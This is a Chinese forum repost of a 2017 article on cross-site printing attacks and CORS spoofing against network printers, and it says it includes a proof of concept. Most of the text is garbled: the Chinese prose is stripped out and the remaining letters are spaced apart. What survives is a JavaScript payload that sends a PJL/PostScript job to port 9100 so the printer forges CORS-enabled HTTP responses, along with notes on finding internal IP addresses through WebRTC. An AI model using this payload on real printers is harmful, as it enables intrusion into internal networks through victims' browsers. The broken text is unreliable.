搜索

[3511] 2017-02-03_2017如何入侵打印机?跨站打印(简称XSP)攻击+CORS欺诈【含POC】

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-16
2017-02-03_2017如何入侵打印机?跨站打印(简称XSP)攻击+CORS欺诈【含POC】 2 0 1 7 X S P + C O R S   P O C   E   E   2 0 1 7 - 0 2 - 0 3 P o s t S c r i p t b u g E 2 3   B r o t h e r L e x m a r k 2 0 使 P o s t S c r i p t P J L 6 2 M F P P o s t S c r i p t P J L 访 U S B C O R S (   h t t p : / / h a c k i n g - p r i n t e r s . n e t / w i k i / i n d e x . p h p / C r o s s - s i t e _ p r i n t i n g ) P r i n t e r   E x p l o i t a t i o n   T o o l k i t P R E T P y t h o n P o s t S c r i p t P J L 访 U S B P o s t S c r i p t P J L 访 G i t H u b P R E T 访
E 访 C O R S C O R S X P S I f r a m e 9 1 0 0 / t c p H T T P   P O S T W e b X P S 使 I f r a m e 9 1 0 0 / t c p H T T P   P O S T W e b H T T P P O S T P o s t S c r i p t P J L P o s t S c r i p t 使 P o s t S c r i p t 9 1 0 0 / t c p H T T P H T T P C R O S 访 - - - J a v a S c r i p t 访 J a v a S c r i p t j o b   =   " x 1 B % - 1 2 3 4 5 X r n "         +   " % ! r n "         +   " ( H T T P / 1 . 0   2 0 0   O K n )   p r i n t r n "
        +   " ( S e r v e r :   P o s t S c r i p t   H T T P D n )   p r i n t r n "         +   " ( A c c e s s - C o n t r o l - A l l o w - O r i g i n :   * n )   p r i n t r n "         +   " ( C o n n e c t i o n :   c l o s e n )   p r i n t r n "         +   " ( C o n t e n t - L e n g t h :   )   p r i n t r n "         +   " p r o d u c t   d u p   l e n g t h   d u p   s t r i n g   c v s   p r i n t r n "         +   " ( n n )   p r i n t r n "         +   " p r i n t r n "         +   " ( n )   p r i n t   f l u s h r n "         +   " x 1 B % - 1 2 3 4 5 X r n " ; v a r   x   =   n e w   X M L H t t p R e q u e s t ( ) ; x . o p e n ( " P O S T " ,   " h t t p : / / p r i n t e r : 9 1 0 0 " ) ; x . s e n d ( j o b ) ; x . o n r e a d y s t a t e c h a n g e   =   f u n c t i o n ( )   {     i f   ( x . r e a d y S t a t e   = =   4 )         a l e r t ( x . r e s p o n s e T e x t ) ; } ; P C L C O R S P J L C O R S 使 @ P J L   E C H O   H T T P X S P P o s t S c r i p t P o s t S c r i p t H T T P U E L P J L C o n t e n t - L e n g t h   P o s t S c r i p t C o n n e c t i o n :   c l o s e   H T T P / 1 . 1 访 X H R H T T P J a v a S c r i p t U R L O r i g i n H T T P H T T P I P P L P D F T P W e b X S P P J L P J L C O R S L P D F T P 访 W e b I P P H T T P   P O S T C o n t e n t - t y p e   a p p l i c a t i o n / i p p   X H R
X S P W e b R T C I P I P X H R 2 5 3 9 1 0 0 / t c p P o s t S c r i p t C O R S J a v a S c r i p t   W e b R T C S a f a r i C h r o m e E d g e I E W e b R T C V B S c r i p t J a v a I P X H R 8 0 . 访 1 1 5 访 P O C h a c k i n g - p r i n t e r s . n e t / x s p / 4 8 C h r o m e   5 2 O p e r a   3 9 I E   1 0 T o r T o r X S P h t t p s : / / g i t h u b . c o m / R U B - N D S / P R E T P O C h t t p : / / h a c k i n g - p r i n t e r s . n e t / x s p /   S S D E E   z h u - g e l i a n g   e a p p @ e a s y a q . c o m @ E 沿 E E A Q a p p E w w w . e a s y a q . c o m   ,  

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理